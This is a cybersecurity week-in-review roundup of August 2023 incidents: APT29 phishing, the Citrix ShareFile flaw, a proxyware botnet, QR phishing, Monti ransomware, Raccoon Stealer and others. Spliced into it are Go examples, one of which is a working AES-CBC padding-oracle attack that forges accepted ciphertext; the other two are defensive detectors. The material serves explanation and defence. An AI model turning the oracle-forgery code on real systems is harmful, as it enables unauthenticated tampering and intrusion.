Thursday, August 17th, 2023
Cybersecurity Week in Review (18/08/2023)
Russian Hackers Use Zulip Chat App for Covert C&C in Diplomatic Phishing Attacks
An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors.
The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes).
The threat actor used Zulip – an open-source chat application – for command-and-control, to evade and hide its activities behind legitimate web traffic.
APT29’s use of invitation themes has been previously reported by Lab52, which documented an attack that impersonates the Norwegian embassy to deliver a DLL payload that’s capable of contacting a remote server to fetch additional payloads.
The use of the domain “bahamas.gov[.]bs” in both intrusion sets further solidifies this link.
Command-and-control is facilitated by making use of Zulip’s API to send victim details to an actor-controlled chat room (toyy.zulipchat[.]com) as well as to remotely commandeer the compromised hosts.
It’s worth noting that the abuse of Zulip is par for the course with the state-sponsored group, which has a track record of leveraging a wide array of legitimate internet services such as Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, and Trello for C2.
APT29’s primary targets are governments and government subcontractors, political organizations, research firms, and critical industries in the U.S. and Europe. But in an interesting twist, an unknown adversary has been observed employing its tactics to breach Chinese-speaking users with Cobalt Strike.
The development comes as the Computer Emergency Response Team of Ukraine (CERT-UA) warned of a new set of phishing attacks against state organizations of Ukraine using a Go-based open-source post-exploitation toolkit called Merlin. The activity is being tracked under the moniker UAC-0154.
The war-torn country has also faced sustained cyber assaults from Sandworm, an elite hacking unit affiliated with Russian military intelligence, primarily intended to disrupt critical operations and gather intelligence to gain a strategic advantage.
According to a recent report from the Security Service of Ukraine (SBU), the threat actor is said to have unsuccessfully attempted to gain unauthorized access to Android tablets possessed by Ukrainian military personnel for planning and performing combat missions.
“The capture of devices on the battlefield, their detailed examination, and the use of available access, and software became the primary vector for the initial access and malware distribution,” the security agency said.
Some of the malware strains include NETD to ensure persistence, DROPBEAR to establish remote access, STL to gather data from the Starlink satellite system, DEBLIND to exfiltrate data, and the Mirai botnet malware. The attackers also used a Tor hidden service to reach the device on the local network over the Internet.
CISA Adds Citrix ShareFile Flaw to KEV Catalog Due to In-the-Wild Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Citrix ShareFile storage zones controller to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active in-the-wild exploitation.
Tracked as CVE-2023-24489 (CVSS score: 9.8), the shortcoming has been described as an improper access control bug that, if successfully exploited, could allow an unauthenticated attacker to compromise vulnerable instances remotely.
The problem is rooted in ShareFile’s handling of cryptographic operations, enabling adversaries to upload arbitrary files, resulting in remote code execution.
“This vulnerability affects all currently supported versions of customer-managed ShareFile storage zones controller before version 5.11.24,” Citrix said in an advisory released in June. Dylan Pindur of Assetnote has been credited with discovering and reporting the issue.
It’s worth noting that the first signs of exploitation of the vulnerability emerged toward the end of July 2023.
The identity of the threat actors behind the attacks is unknown, although the Cl0p ransomware gang has taken a particular interest in taking advantage of zero-days in managed file transfer solutions such as Accellion FTA, SolarWinds Serv-U, GoAnywhere MFT, and Progress MOVEit Transfer in recent years.
Specifically, the application uses AES in CBC mode with PKCS7 padding but does not authenticate the ciphertext or validate the decrypted data beyond the padding check. An attacker who can tell accepted from rejected ciphertexts can therefore submit attacker-controlled ciphertext that still passes the padding check, which leads to unauthenticated arbitrary file upload and remote code execution.
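To make that failure mode concrete, here is an added example written for this review in Go; it is not Citrix's code and not Assetnote's exploit. It models a server that AES-CBC-decrypts a client-supplied token and checks nothing but PKCS7 padding, shows how an attacker who only sees accept/reject answers recovers the cipher's intermediate state for a ciphertext block they chose and then forges a token that decrypts to a value of their choosing with valid padding, and contrasts that with an AES-GCM decryptor that rejects the same bytes. The key, the token layout (IV followed by one ciphertext block) and the payload string are assumptions; the page does not describe how ShareFile structures its tokens.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

const bs = aes.BlockSize

// WeakDecrypt models the flawed design: AES-CBC decrypt, then trust anything that
// carries valid PKCS7 padding. Nothing proves the ciphertext was minted by the server.
func WeakDecrypt(key, ct []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(ct) < 2*bs || len(ct)%bs != 0 {
		return nil, errors.New("bad key or length")
	}
	pt := make([]byte, len(ct)-bs)
	cipher.NewCBCDecrypter(block, ct[:bs]).CryptBlocks(pt, ct[bs:])
	n := int(pt[len(pt)-1])
	if n == 0 || n > bs || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding") // the only check the attacker must satisfy
	}
	return pt[:len(pt)-n], nil
}

// RecoverIntermediate learns D_K(c1) byte by byte from accept/reject answers alone.
// In CBC, P = D_K(c1) XOR IV, so once D_K(c1) is known the attacker picks P via the IV.
func RecoverIntermediate(oracle func(ct []byte) bool, c1 []byte) []byte {
	inter, iv := make([]byte, bs), make([]byte, bs)
	try := func(flip byte) bool { // submit IV||c1, optionally disturbing IV byte 14
		ct := append(append([]byte{}, iv...), c1...)
		ct[bs-2] ^= flip
		return oracle(ct)
	}
	for pos := bs - 1; pos >= 0; pos-- {
		pad := byte(bs - pos)
		for k := pos + 1; k < bs; k++ {
			iv[k] = inter[k] ^ pad // steer already-recovered bytes to the padding value
		}
		for g := 0; g < 256; g++ {
			iv[pos] = byte(g)
			// A last-byte hit could be 0x02 0x02 (or longer) padding rather than 0x01;
			// disturbing byte 14 breaks those but leaves genuine 0x01 padding intact.
			if try(0) && (pos < bs-1 || try(0xff)) {
				inter[pos] = byte(g) ^ pad
				break
			}
		}
	}
	return inter
}

// Forge returns IV || c1 that WeakDecrypt accepts and decrypts to want (at most 15 bytes).
func Forge(inter, c1, want []byte) []byte {
	if len(want) >= bs {
		return nil // a longer message needs more blocks than this demo handles
	}
	iv := make([]byte, bs)
	for i := range iv {
		p := byte(bs - len(want)) // PKCS7 padding byte...
		if i < len(want) {
			p = want[i] // ...or the attacker's chosen content
		}
		iv[i] = inter[i] ^ p
	}
	return append(iv, c1...)
}

// OpenGCM is the hardened counterpart: an AEAD rejects anything not produced
// under the key, so the forgery fails before any plaintext is interpreted.
func OpenGCM(key, nonceAndCt []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	g, err := cipher.NewGCM(block)
	if err != nil || len(nonceAndCt) < g.NonceSize() {
		return nil, errors.New("bad input")
	}
	return g.Open(nil, nonceAndCt[:g.NonceSize()], nonceAndCt[g.NonceSize():], nil)
}

// Demo runs the attack against a random key the attacker never sees. It returns what
// the weak decryptor accepts and the error the authenticated decryptor raises.
func Demo(want []byte) ([]byte, error) {
	key, c1 := make([]byte, 16), make([]byte, bs)
	rand.Read(key)
	rand.Read(c1) // any block; the attacker only needs to learn its decryption
	oracle := func(ct []byte) bool { _, err := WeakDecrypt(key, ct); return err == nil }
	forged := Forge(RecoverIntermediate(oracle, c1), c1, want)
	plain, _ := WeakDecrypt(key, forged)
	_, gcmErr := OpenGCM(key, forged)
	return plain, gcmErr
}

func main() {
	plain, gcmErr := Demo([]byte("attacker chosen")) // hypothetical payload string
	fmt.Printf("weak decryptor accepted %q; AES-GCM said: %v\n", plain, gcmErr)
}
```

The forgery needs at most 16 × 256 oracle queries, which is why an endpoint that answers differently for bad padding than for other failures is the whole vulnerability. The fix is not a stricter padding check but an authenticated mode (AES-GCM, or encrypt-then-MAC with constant-time tag comparison) so that nothing attacker-crafted is ever interpreted.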
Federal Civilian Executive Branch (FCEB) agencies have been mandated to apply vendor-provided fixes to remediate the vulnerability by September 6, 2023.
The development comes as security alarms have been raised about active exploitation of CVE-2023-3519, a critical vulnerability affecting Citrix’s NetScaler product, to deploy PHP web shells on compromised appliances and gain persistent access.
Massive 400,000 Proxy Botnet Built with Stealthy Malware Infections
Researchers have uncovered a massive campaign that delivered proxy server apps to at least 400,000 Windows systems. The devices act as residential exit nodes without users’ consent and a company is charging for the proxy traffic running through the machines.
Residential proxies are valuable to cybercriminals because they can help with deploying large-scale credential stuffing attacks from fresh IP addresses. They also have legitimate purposes like ad verification, data scraping, website testing, or privacy-enhancing rerouting.
Some proxy companies sell access to residential proxies and offer monetary rewards to users who agree to share their bandwidth. The 400,000-node proxy network was built by using malicious payloads that delivered the proxy application.
Despite the company behind the botnet claiming that users gave their consent, the researchers discovered that the proxy was installed silently on the devices. The same company controlled exit nodes created by a malicious payload called AdLoad that targeted macOS systems, which AT&T reported last week.
In fact, the two Go-based binaries (for macOS and Windows) appear to originate from the same source code, but the Windows proxy client evades antivirus detection because it carries a valid digital signature.
The infection starts with the execution of a loader hidden in cracked software and games, which downloads and installs the proxy application automatically in the background without user interaction. The malware authors use Inno Setup with specific parameters that hide any indicators of the installation process and all typical user prompts.
During the installation of the proxy client, the malware sends specific parameters, which are also relayed to the command and control (C2) server so that the new client can be registered and incorporated into the botnet.
The proxy client establishes persistence on the infected system by adding a Run registry key that launches it when the system boots and a scheduled task that checks for new client updates.
Researchers recommend looking for a “Digital Pulse” executable under %AppData% and for a similarly named value under the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key, and removing any that are present.
The name of the scheduled task is “DigitalPulseUpdateTask” and should also be deleted to eliminate the chance of the client update mechanism re-introducing the infection.
Finally, avoid downloading pirated software and running executables sourced from dubious locations such as peer-to-peer networks or sites offering premium software free of charge.
Signs of proxyware infection include performance and internet speed degradation, unexpected network traffic patterns, frequent communication with unknown IPs or domains, and system alerts.
Cleaning Products Giant Clorox Takes Systems Offline Following Cyberattack
Cleaning products manufacturer and marketer Clorox Company says it has taken certain systems offline in response to a cyberattack.
“The Clorox Company recently identified unusual activity on our IT systems. Upon detection, we immediately took steps to stop the activity and took certain systems offline,” the company said in response to an inquiry.
Clorox also said that the affected systems remain offline as it is working on adding more “protections and hardening measures to further secure them”.
“As a result, some operations are temporarily impaired. We are following our business continuity plans and implementing workarounds where possible,” the company explained.
In a Form 8-K filing with the Securities and Exchange Commission (SEC), the company said it has implemented workarounds to enable offline operations and continue servicing customers, but disruptions are expected to continue.
Clorox also told the SEC that it has informed law enforcement of the incident and that it is working with third-party cybersecurity experts to investigate the attack and restore its operations.
The company did not provide additional information on the type of cyberattack that it has fallen victim to, but taking systems offline is typically the immediate response to a ransomware infection.
Clorox did not say whether any data was stolen from its systems, nor how long it might take to restore the impacted systems.
“The investigation into the nature and scope of the incident remains ongoing and is in its very early stages. Our team is working diligently to restore systems safely and quickly, and we will ensure all suppliers and customers are updated as appropriate,” the company said.
Based in Oakland, California, Clorox makes and sells consumer and professional cleaning products, including Brita, Glad, Green Works Cleaning Products, Kingsford, Liquid-Plumr, Pine-Sol, and Tilex. The company has locations in 25 countries and territories worldwide and a market presence in over 100 countries.
Major U.S. Energy Organization Targeted in QR Code Phishing Attack
A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security.
Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%).
This is the first time that QR codes have been used at this scale, indicating that more phishing actors may be testing their effectiveness as an attack vector. The attack begins with a phishing email that claims the recipient must take action to update their Microsoft 365 account settings.
The emails carry PNG or PDF attachments featuring a QR code the recipient is prompted to scan to verify their account. The emails also state that the target must complete this step in 2-3 days to add a sense of urgency.
The threat actors use QR codes embedded in images to bypass email security tools that scan a message for known malicious links, allowing the phishing messages to reach the target’s inbox. To evade security, the QR codes in this campaign also use redirects in Bing, Salesforce, and Cloudflare’s Web3 services to redirect the targets to a Microsoft 365 phishing page.
Hiding the redirection URL in the QR code, abusing legitimate services, and using base64 encoding for the phishing link all help evade detection and get through email protection filters.
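As an added example (not from the Cofense report or from the campaign itself), the Go program below shows how a mail filter can statically unwrap such a chain once the QR image has been decoded to its URL: it parses each URL, looks for another URL carried verbatim or base64-encoded in a query value or in the fragment, and repeats until nothing further is embedded, so the host that is actually scored is the final landing page rather than the legitimate redirector. The redirector hosts, parameter names and landing page are placeholders constructed for the demo; decoding the QR image itself needs a QR library and is out of scope here.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"net/url"
	"strings"
)

// Decoders tried on every query value: QR phishing kits use both standard and
// URL-safe base64, with and without padding.
var decoders = []*base64.Encoding{
	base64.StdEncoding, base64.URLEncoding, base64.RawStdEncoding, base64.RawURLEncoding,
}

func looksLikeURL(s string) bool {
	return strings.HasPrefix(s, "http://") || strings.HasPrefix(s, "https://")
}

// embeddedURL returns a URL carried in v either verbatim or base64-encoded.
func embeddedURL(v string) (string, bool) {
	if looksLikeURL(v) {
		return v, true
	}
	for _, enc := range decoders {
		if b, err := enc.DecodeString(v); err == nil && looksLikeURL(string(b)) {
			return string(b), true
		}
	}
	return "", false
}

// UnwrapRedirects follows redirector nesting by string analysis only (no network
// requests), returning every URL recovered, outermost first. The fragment is
// checked first because client-side redirectors often carry the target there.
func UnwrapRedirects(raw string, maxHops int) []string {
	chain := []string{raw}
	for hop := 0; hop < maxHops; hop++ {
		u, err := url.Parse(chain[len(chain)-1])
		if err != nil {
			break
		}
		candidates := []string{u.Fragment}
		for _, vals := range u.Query() {
			candidates = append(candidates, vals...)
		}
		next := ""
		for _, c := range candidates {
			if dest, ok := embeddedURL(c); ok {
				next = dest
				break
			}
		}
		if next == "" {
			break
		}
		chain = append(chain, next)
	}
	return chain
}

// FinalHost is what a filter should score: the host the victim's phone lands on.
func FinalHost(raw string) string {
	chain := UnwrapRedirects(raw, 5)
	u, err := url.Parse(chain[len(chain)-1])
	if err != nil {
		return ""
	}
	return u.Hostname()
}

// SampleQRPayload constructs (not captured from the campaign) a two-hop chain: a
// redirector whose parameter carries a second redirector, whose parameter carries
// the base64-encoded landing page. All hosts are placeholders.
func SampleQRPayload() string {
	landing := "https://m365-verify.example.test/login?acct=victim%40example.com"
	inner := "https://redirect.example.org/out?target=" +
		url.QueryEscape(base64.StdEncoding.EncodeToString([]byte(landing)))
	return "https://cdn.example.com/r?u=" + url.QueryEscape(inner)
}

func main() {
	for i, hop := range UnwrapRedirects(SampleQRPayload(), 5) {
		fmt.Printf("hop %d: %s\n", i, hop)
	}
	fmt.Println("final host:", FinalHost(SampleQRPayload()))
}
```

The hop limit matters: a redirector whose parameter points back at itself would otherwise loop, and anything that still embeds a URL after five hops deserves a manual look anyway.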
QR codes have been used in phishing campaigns, albeit on a smaller scale, in the past, including one in France and one in Germany. Scammers have also employed QR codes to trick people into scanning them and redirect them to malicious websites that attempt to steal their money.
In January 2022, the FBI warned that cybercriminals increasingly use QR codes to steal credentials and financial information. Despite their effectiveness in bypassing protections, QR codes still require the victim to take action to get compromised, which is a decisive mitigating factor working in favor of well-trained personnel. Also, most QR code scanners on modern smartphones will ask the user to verify the destination URL before launching the browser as a protective step.
Apart from training, organizations should use image recognition tools as part of their phishing protection measures, although these are not guaranteed to catch all QR code threats.
Gigabud RAT Android Banking Malware Targets Institutions Across Countries
Account holders of numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called Gigabud RAT.
One of Gigabud RAT’s unique features is that it doesn’t execute any malicious actions until the user is authorized into the malicious application by a fraudster, which makes it harder to detect. Instead of using HTML overlay attacks, Gigabud RAT gathers sensitive information primarily through screen recording.
Gigabud RAT was first documented in January 2023 after it was spotted impersonating bank and government apps to siphon sensitive data. It’s known to be active in the wild since at least July 2022.
A second variant of the malware minus the RAT capabilities was also identified. Dubbed Gigabud.Loan, it comes under the guise of a loan application that’s capable of exfiltrating user-input data. The targets were individuals lured into filling out a bank card application form to obtain a low-interest loan. The victims are convinced to provide personal information during the application process.
Both malware versions are spread via phishing websites, the links to which are delivered to victims via SMS or instant messages on social media networks. Gigabud.Loan is also distributed directly in the form of APK files sent through messages on WhatsApp. Targets who are approached on social media are often coerced into visiting the sites under the pretext of completing a tax audit and claiming a refund.
While Android devices have the “Install from Unknown Sources” setting disabled by default as a security measure to prevent the installation of apps from untrusted sources, the operating system allows other apps installed on the device, such as web browsers, email clients, file managers, and messaging apps, to request the “REQUEST_INSTALL_PACKAGES” permission.
Should a user grant permission to such apps, it allows the threat actors to install rogue APK files while bypassing the “Install from Unknown Sources” option.
Gigabud functions much like other Android banking trojans, requesting accessibility service permissions to capture the screen and log keystrokes. It is also equipped to replace bank card numbers in the clipboard and perform automated fund transfers through remote access.
On the other hand, Gigabud.Loan functions as a tool to collect personal information such as full name, identity number, national identity document photo, digital signature, education, income info, bank card information, and phone number under the guise of submitting a loan request to the bank.
Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics
The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in attacks targeting government and legal sectors.
Monti emerged in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. The new version is a departure of sorts, differing significantly from its Linux-based predecessors: where the earlier variant was built largely on the leaked Conti source code, this one uses a different encryptor with additional distinct behaviors.
Analysis has revealed that while the older iterations had a 99% similarity rate with Conti, the latest version has only a 29% similarity rate, suggesting an overhaul.
Some of the crucial changes include the addition of a `--whitelist` parameter to instruct the locker to skip a list of virtual machines as well as the removal of the command-line arguments `--size`, `--log`, and `--vmlist`.
The Linux variant is also designed to tamper with the motd (aka message of the day) file to display the ransom note, employ AES-256-CTR encryption instead of Salsa20, and solely rely on the file size for its encryption process.
In other words, files smaller than 1.048 MB (1 MiB, 0x100000 bytes) have all their contents encrypted; files larger than 1.048 MB but smaller than 4.19 MB (4 MiB) have only their first 0xFFFFF bytes (just under 1 MiB) encrypted; and files exceeding 4.19 MB have a chunk of their content locked whose extent depends on the outcome of a shift-right operation on the file size.
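Because only a prefix of a mid-sized file is encrypted, a file that reads as random for its first 0xFFFFF bytes and as structured data thereafter is a telltale artifact, and its tail is still recoverable. As an added detection idea (not part of the Trend Micro analysis or of the Monti code), the Go program below splits a buffer at that boundary and compares the Shannon entropy of the two parts; the 7.9 bits-per-byte threshold and the ledger-style sample file are constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"fmt"
	"math"
)

// Size band from the Monti Linux analysis: 1.048 MB and 4.19 MB are 1 MiB and 4 MiB.
const (
	oneMiB       = 1 << 20 // 1,048,576 bytes; below this the whole file is encrypted
	prefixLen    = 0xFFFFF // 1,048,575 bytes encrypted for files in the 1..4 MiB band
	encThreshold = 7.9     // bits/byte; random or encrypted data sits close to 8.0
)

// Entropy returns the Shannon entropy of b in bits per byte (0 to 8).
func Entropy(b []byte) float64 {
	if len(b) == 0 {
		return 0
	}
	var counts [256]int
	for _, c := range b {
		counts[c]++
	}
	h, n := 0.0, float64(len(b))
	for _, c := range counts {
		if c > 0 {
			p := float64(c) / n
			h -= p * math.Log2(p)
		}
	}
	return h
}

// ClassifyEncryption splits a file at the 0xFFFFF boundary when it is at least 1 MiB
// and compares the entropy of the two parts. "prefix-encrypted" is the signature the
// text describes for the 1..4 MiB band; above 4 MiB the encrypted span is size
// dependent, so the verdict there is only a first-pass hint.
func ClassifyEncryption(data []byte) string {
	head, tail := data, []byte(nil)
	if len(data) >= oneMiB {
		head, tail = data[:prefixLen], data[prefixLen:]
	}
	headEnc := Entropy(head) > encThreshold
	tailEnc := len(tail) > 0 && Entropy(tail) > encThreshold
	switch {
	case headEnc && (len(tail) == 0 || tailEnc):
		return "fully-encrypted"
	case headEnc && !tailEnc:
		return "prefix-encrypted"
	case !headEnc && tailEnc:
		return "suspicious-tail" // not a pattern the text describes; flag for a human
	}
	return "plaintext"
}

// SampleVictimFile constructs (not from a real incident) a 2 MiB ledger-like text file
// whose first 0xFFFFF bytes have been replaced with random data, as the text says
// Monti does for files in this size band.
func SampleVictimFile() []byte {
	line := []byte("Quarterly ledger entry 0042; amount 17.50; ")
	data := bytes.Repeat(line, 2*oneMiB/len(line)+1)[:2*oneMiB]
	rand.Read(data[:prefixLen])
	return data
}

func main() {
	fmt.Println("sample victim file:", ClassifyEncryption(SampleVictimFile()))
	fmt.Println("all-text file:     ", ClassifyEncryption(bytes.Repeat([]byte("abc"), oneMiB)))
}
```

Two caveats a responder should keep in mind: formats that are compressed or encrypted by design (archives, JPEGs, some database files) have high entropy natively and will read as "fully-encrypted", and entropy measured over only a few hundred bytes undershoots 8.0, so the threshold suits files of tens of kilobytes and up.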
“It’s likely that the threat actors behind Monti still employed parts of the Conti source code as the base for the new variant, as evidenced by some similar functions, but implemented significant changes to the code — especially to the encryption algorithm,” the researchers said.
“Furthermore, by altering the code, Monti’s operators are enhancing its ability to evade detection, making their malicious activities even more challenging to identify and mitigate.”
Charming Kitten Targets Iranian Dissidents with Advanced Cyber Attacks
Germany’s Federal Office for the Protection of the Constitution (BfV) has warned of cyber attacks targeting Iranian persons and organizations in the country since the end of 2022.
“The cyber attacks were mainly directed against dissident organizations and individuals – such as lawyers, journalists, or human rights activists – inside and outside Iran,” the agency said in an advisory.
The intrusions have been attributed to a threat actor called Charming Kitten, which is also tracked under the names APT35, Mint Sandstorm, TA453, and Yellow Garuda.
While Iranian nation-state actors lag behind their Russian and Chinese counterparts in sophistication, they have demonstrated a continued advancement of tools and techniques, adding an arsenal of custom malware to facilitate information gathering and rapidly exploiting n-day security flaws to obtain initial access.
Charming Kitten, in particular, has a long, storied history of leveraging elaborate social engineering and fictitious online identities that are tailor-made to target victims. It also impersonates real journalists and NGO employees in a bid to build rapport and increase the likelihood of success of the attacks.
Once a successful contact is made, the hacking crew has been observed sending links to an online video chat that, when clicked, urge victims to enter their login information on a phishing page, effectively resulting in credential theft. The phishing site impersonates a legitimate online service provider such as Google or Microsoft.
“If an online video chat occurs, it serves to conceal the attack,” BfV said. “After logging in to the victim’s user account from a C2 server, the attacker is able to download the entire user data, e.g. by means of Google Takeout.”
It’s worth noting that the Google Threat Analysis Group (TAG), in August 2022, detailed a malware called HYPERSCRAPE used by the threat actor to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts.
The attacks also mirror prior findings, which disclosed a credential phishing campaign aimed at human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East around the same time.
Discord.io Confirms Breach After Hacker Steals Data of 760K Users
The Discord.io custom invite service has temporarily shut down after suffering a data breach exposing the information of 760,000 members.
Discord.io is not an official Discord site but a third-party service allowing server owners to create custom invites to their channels. Most of the community was built around the service’s Discord server, with over 14,000 members.
Yesterday, a person known as ‘Akhirah’ began offering the Discord.io database for sale on the new Breached hacking forums. As proof of the theft, the threat actor shared four user records from the database.
For those unfamiliar with the new Breached, it is the rebirth of a popular cybercrime forum known for the sale and leaking of data stolen in data breaches.
The most sensitive information in the breach is a member’s username, email address, billing address (small number of people), salted and hashed password (small number of people), and Discord ID.
“This information is not private and can be obtained by anyone sharing a server with you. Its inclusion in the breach does, however, mean that other people might be able to link your Discord account to a given email address,” Discord.io explained about the leaking of Discord IDs.
Discord.io has confirmed the authenticity of the breach in a notice to its Discord server and website and has begun temporarily shutting down its services in response.
“Discord.io has suffered a data breach. We are stopping all operations for the foreseeable future,” reads a message on the service’s Discord server.
“For more information, please refer to our #breach-notification channel. We’ll be updating our website soon with a copy of this message.”
The website for Discord.io contains a timeline explaining that they first learned of the data breach after seeing the post on the hacking forum.
Soon after, they confirmed the authenticity of the leaked data and began shutting down their services and canceling all paid memberships. Discord.io says they have not been contacted by the individual behind the breach and have not shared any information on how they were breached.
Raccoon Stealer Malware Returns With New Stealthier Version
The developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals.
Raccoon is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors. The malware steals data from over 60 applications, including login credentials, credit card information, browsing history, cookies, and cryptocurrency wallet accounts.
The project entered a period of uncertainty in October 2022, when its primary author, Mark Sokolovsky, was arrested in the Netherlands and the FBI took down the infrastructure of what was then a malware-as-a-service operation.
In a new post to a hacker forum, the malware’s current authors informed the cybercriminal community that they’re back, having spent their time “working tirelessly” to bring them new features that will enrich the user experience.
These new features were implemented after “customer” feedback, requests, and cybercrime trends, aiming to keep the malware in the top tier of the info-stealers market.
Raccoon 2.3.0 has introduced several “quality of life” and OpSec improvements that make it easier and safer to use, making it easier to use for less skilled threat actors and less likely for them to be traced by researchers and law enforcement.
First, a new quick search tool in the Raccoon Stealer dashboard allows hackers to easily find specific stolen data and retrieve credentials, documents, or other stolen data from massive datasets.
Secondly, the new Raccoon version features a system that counters suspicious activities that might be related to security-assisting bots, like multiple access events generated from the same IP. In those cases, Raccoon will automatically delete the corresponding records and update all client pads accordingly.
The user can now see the activity profile score of each IP address right from the malware’s dashboard, where green, yellow, and red smiley icons indicate the probability of bot activity.
A third important new feature incorporated as a protective measure against security researchers is a reporting system that detects and blocks IPs used by crawlers and bots that cyber-intelligence firms use to monitor Raccoon’s traffic. Finally, a new Log Stats panel gives users a “quick-glance” overview of their operations, the most successfully targeted regions, the number of breached computers, etc.
Information stealers constitute a massive threat to both home users and businesses, as their widespread adoption by the cybercrime community ensures payloads are distributed through a myriad of channels, reaching a large and diverse audience.